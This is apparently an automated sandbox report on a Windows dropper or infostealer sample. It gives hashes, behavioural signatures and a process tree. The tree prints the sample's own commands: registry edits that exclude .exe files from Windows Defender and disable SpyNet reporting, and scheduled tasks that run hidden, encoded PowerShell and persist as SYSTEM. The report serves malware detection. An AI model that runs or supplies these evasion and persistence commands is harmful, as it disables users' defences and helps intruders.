Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
172s -
max time network
196s -
platform
windows10-1703_x64 -
resource
win10-20230621-en -
resource tags
arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system -
submitted
30/06/2023, 22:38
Static task
static1
Behavioral task
behavioral1
Sample
5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe
Resource
win7-20230621-en
General
-
Target
5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe
-
Size
7.1MB
-
MD5
3d12defeb118889eee18dd015406e84d
-
SHA1
0e5c54d54eb2f964b493839f0ca2136253b8effa
-
SHA256
5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5
-
SHA512
d0c2d4088430782163fca845d70390af32dfc0a72d694753a9b743adb69b19d20a2dfc96f9d45c02778d6503179b8fbeeae18f4e3638be25f2479b4b819f906f
-
SSDEEP
196608:91OBCpw0ZAljaWc5kWi2sJUSxtqiMlsvrKN1aCHaenvj:3OBAceH22y5xtqiM6Buvj
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 34 4424 rundll32.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2920667096-3376612704-1562175574-1000\Control Panel\International\Geo\Nation UNFfcVL.exe -
Executes dropped EXE 4 IoCs
pid Process 4580 Install.exe 5000 Install.exe 5012 nOqoXWB.exe 4484 UNFfcVL.exe -
Loads dropped DLL 1 IoCs
pid Process 4424 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json UNFfcVL.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json UNFfcVL.exe -
Drops desktop.ini file(s) 1 IoCs
description ioc Process File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini UNFfcVL.exe -
Drops file in System32 directory 33 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol nOqoXWB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_B7F77CA30FDEE9C9F40235DCDC85DF26 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\332AE85844D5D265D103A09CD0D883C2 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_B7F77CA30FDEE9C9F40235DCDC85DF26 UNFfcVL.exe File created C:\Windows\system32\GroupPolicy\gpt.ini Install.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 UNFfcVL.exe File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_0000B55B07F557912D5F544EE3812859 UNFfcVL.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini nOqoXWB.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_0000B55B07F557912D5F544EE3812859 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\A16C6C16D94F76E0808C087DFC657D99_FC5D5D6049B16E7D2E12046A21F4E610 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\A16C6C16D94F76E0808C087DFC657D99_FC5D5D6049B16E7D2E12046A21F4E610 UNFfcVL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\332AE85844D5D265D103A09CD0D883C2 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\counters2.dat rundll32.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA UNFfcVL.exe File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 UNFfcVL.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 UNFfcVL.exe -
Drops file in Program Files directory 14 IoCs
description ioc Process File created C:\Program Files (x86)\gPtoEFCUU\Ovewfrj.xml UNFfcVL.exe File created C:\Program Files (x86)\WASabAiYZoPU2\PhDTgomiLYBqG.dll UNFfcVL.exe File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi UNFfcVL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja UNFfcVL.exe File created C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\topXYZo.xml UNFfcVL.exe File created C:\Program Files (x86)\gVmmTejSMDqsC\VHfGkrZ.xml UNFfcVL.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UNFfcVL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak UNFfcVL.exe File created C:\Program Files (x86)\KJXFElJjZabuIxmUcOR\TlmtEdZ.dll UNFfcVL.exe File created C:\Program Files (x86)\xTRsizlJSGUn\tCJIaGy.dll UNFfcVL.exe File created C:\Program Files (x86)\gPtoEFCUU\hToiYq.dll UNFfcVL.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi UNFfcVL.exe File created C:\Program Files (x86)\WASabAiYZoPU2\eiHQSGu.xml UNFfcVL.exe File created C:\Program Files (x86)\gVmmTejSMDqsC\CtPzhQU.dll UNFfcVL.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\bjVqJkGFAiNaUEAvEn.job schtasks.exe File created C:\Windows\Tasks\MZObKWyefxVnmbFER.job schtasks.exe File created C:\Windows\Tasks\VHLBDothpetOaQE.job schtasks.exe File created C:\Windows\Tasks\teabCtqLwEhjalrvZ.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 11 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4156 schtasks.exe 1280 schtasks.exe 4800 schtasks.exe 2760 schtasks.exe 1684 schtasks.exe 4052 schtasks.exe 5064 schtasks.exe 500 schtasks.exe 1188 schtasks.exe 1436 schtasks.exe 3572 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{43f1bf70-0000-0000-0000-d01200000000}\NukeOnDelete = "0" UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{43f1bf70-0000-0000-0000-d01200000000} UNFfcVL.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket\Volume\{43f1bf70-0000-0000-0000-d01200000000}\MaxCapacity = "12287" UNFfcVL.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "1" UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing UNFfcVL.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1" UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix UNFfcVL.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0" UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer UNFfcVL.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs powershell.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1e\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000 powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\OnDemandInterfaceCache UNFfcVL.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs powershell.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\BitBucket UNFfcVL.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 4652 powershell.EXE 4652 powershell.EXE 4652 powershell.EXE 4956 powershell.exe 4956 powershell.exe 4956 powershell.exe 1192 powershell.exe 1192 powershell.exe 1192 powershell.exe 4624 powershell.EXE 4624 powershell.EXE 4624 powershell.EXE 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe 4484 UNFfcVL.exe -
Suspicious use of AdjustPrivilegeToken 4 IoCs
description pid Process Token: SeDebugPrivilege 4652 powershell.EXE Token: SeDebugPrivilege 4956 powershell.exe Token: SeDebugPrivilege 1192 powershell.exe Token: SeDebugPrivilege 4624 powershell.EXE -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 2468 wrote to memory of 4580 2468 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 66 PID 2468 wrote to memory of 4580 2468 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 66 PID 2468 wrote to memory of 4580 2468 5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe 66 PID 4580 wrote to memory of 5000 4580 Install.exe 67 PID 4580 wrote to memory of 5000 4580 Install.exe 67 PID 4580 wrote to memory of 5000 4580 Install.exe 67 PID 5000 wrote to memory of 1020 5000 Install.exe 69 PID 5000 wrote to memory of 1020 5000 Install.exe 69 PID 5000 wrote to memory of 1020 5000 Install.exe 69 PID 5000 wrote to memory of 4104 5000 Install.exe 71 PID 5000 wrote to memory of 4104 5000 Install.exe 71 PID 5000 wrote to memory of 4104 5000 Install.exe 71 PID 1020 wrote to memory of 4792 1020 forfiles.exe 73 PID 1020 wrote to memory of 4792 1020 forfiles.exe 73 PID 1020 wrote to memory of 4792 1020 forfiles.exe 73 PID 4104 wrote to memory of 4840 4104 forfiles.exe 74 PID 4104 wrote to memory of 4840 4104 forfiles.exe 74 PID 4104 wrote to memory of 4840 4104 forfiles.exe 74 PID 4792 wrote to memory of 4852 4792 cmd.exe 75 PID 4792 wrote to memory of 4852 4792 cmd.exe 75 PID 4792 wrote to memory of 4852 4792 cmd.exe 75 PID 4792 wrote to memory of 2624 4792 cmd.exe 76 PID 4792 wrote to memory of 2624 4792 cmd.exe 76 PID 4792 wrote to memory of 2624 4792 cmd.exe 76 PID 4840 wrote to memory of 2660 4840 cmd.exe 77 PID 4840 wrote to memory of 2660 4840 cmd.exe 77 PID 4840 wrote to memory of 2660 4840 cmd.exe 77 PID 4840 wrote to memory of 1452 4840 cmd.exe 78 PID 4840 wrote to memory of 1452 4840 cmd.exe 78 PID 4840 wrote to memory of 1452 4840 cmd.exe 78 PID 5000 wrote to memory of 2760 5000 Install.exe 79 PID 5000 wrote to memory of 2760 5000 Install.exe 79 PID 5000 wrote to memory of 2760 5000 Install.exe 79 PID 5000 wrote to memory of 4740 5000 Install.exe 81 PID 5000 wrote to memory of 4740 5000 Install.exe 81 PID 5000 wrote to memory of 4740 5000 Install.exe 81 PID 4652 wrote to memory of 2944 4652 powershell.EXE 85 PID 4652 wrote to memory of 2944 4652 powershell.EXE 85 PID 5000 wrote to memory of 4152 5000 Install.exe 90 PID 5000 wrote to memory of 4152 5000 Install.exe 90 PID 5000 wrote to memory of 4152 5000 Install.exe 90 PID 5000 wrote to memory of 1684 5000 Install.exe 92 PID 5000 wrote to memory of 1684 5000 Install.exe 92 PID 5000 wrote to memory of 1684 5000 Install.exe 92 PID 5012 wrote to memory of 4956 5012 nOqoXWB.exe 95 PID 5012 wrote to memory of 4956 5012 nOqoXWB.exe 95 PID 5012 wrote to memory of 4956 5012 nOqoXWB.exe 95 PID 4956 wrote to memory of 2840 4956 powershell.exe 97 PID 4956 wrote to memory of 2840 4956 powershell.exe 97 PID 4956 wrote to memory of 2840 4956 powershell.exe 97 PID 2840 wrote to memory of 428 2840 cmd.exe 98 PID 2840 wrote to memory of 428 2840 cmd.exe 98 PID 2840 wrote to memory of 428 2840 cmd.exe 98 PID 4956 wrote to memory of 504 4956 powershell.exe 99 PID 4956 wrote to memory of 504 4956 powershell.exe 99 PID 4956 wrote to memory of 504 4956 powershell.exe 99 PID 4956 wrote to memory of 816 4956 powershell.exe 100 PID 4956 wrote to memory of 816 4956 powershell.exe 100 PID 4956 wrote to memory of 816 4956 powershell.exe 100 PID 4956 wrote to memory of 804 4956 powershell.exe 101 PID 4956 wrote to memory of 804 4956 powershell.exe 101 PID 4956 wrote to memory of 804 4956 powershell.exe 101 PID 4956 wrote to memory of 1368 4956 powershell.exe 102 PID 4956 wrote to memory of 1368 4956 powershell.exe 102
Processes
-
C:\Users\Admin\AppData\Local\Temp\5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe"C:\Users\Admin\AppData\Local\Temp\5a49157da50b87654e0138dc72fd80887f3d0c0278f595dee8b4278dee06b9d5.exe"1⤵
- Suspicious use of WriteProcessMemory
PID:2468 -
C:\Users\Admin\AppData\Local\Temp\7zS5D67.tmp\Install.exe.\Install.exe2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\7zS5EFD.tmp\Install.exe.\Install.exe /CRyggdidWqCv "385118" /S3⤵
- Checks BIOS information in registry
- Executes dropped EXE
- Drops file in System32 directory
- Enumerates system info in registry
- Suspicious use of WriteProcessMemory
PID:5000 -
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions\" /f /v \"exe\" /t REG_SZ /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:1020 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4792 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:326⤵PID:4852
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Extensions" /f /v "exe" /t REG_SZ /d 0 /reg:646⤵PID:2624
-
-
-
-
C:\Windows\SysWOW64\forfiles.exe"C:\Windows\System32\forfiles.exe" /p c:\windows\system32 /m cmd.exe /c "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:32® ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet\" /f /v \"SpyNetReporting\" /t REG_DWORD /d 0 /reg:64&"4⤵
- Suspicious use of WriteProcessMemory
PID:4104 -
C:\Windows\SysWOW64\cmd.exe/C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:32® ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:64&5⤵
- Suspicious use of WriteProcessMemory
PID:4840 -
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:326⤵PID:2660
-
-
\??\c:\windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Spynet" /f /v "SpyNetReporting" /t REG_DWORD /d 0 /reg:646⤵PID:1452
-
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "gzxoqtMMe" /SC once /ST 10:12:15 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="4⤵
- Creates scheduled task(s)
PID:2760
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /run /I /tn "gzxoqtMMe"4⤵PID:4740
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /DELETE /F /TN "gzxoqtMMe"4⤵PID:4152
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /CREATE /TN "bjVqJkGFAiNaUEAvEn" /SC once /ST 22:39:00 /RU "SYSTEM" /TR "\"C:\Users\Admin\AppData\Local\Temp\RVFeavqjGCeKjKoyC\PuBYwzPVDRszCTi\nOqoXWB.exe\" Ko /YAsite_idmXK 385118 /S" /V1 /F4⤵
- Drops file in Windows directory
- Creates scheduled task(s)
PID:1684
-
-
-
-
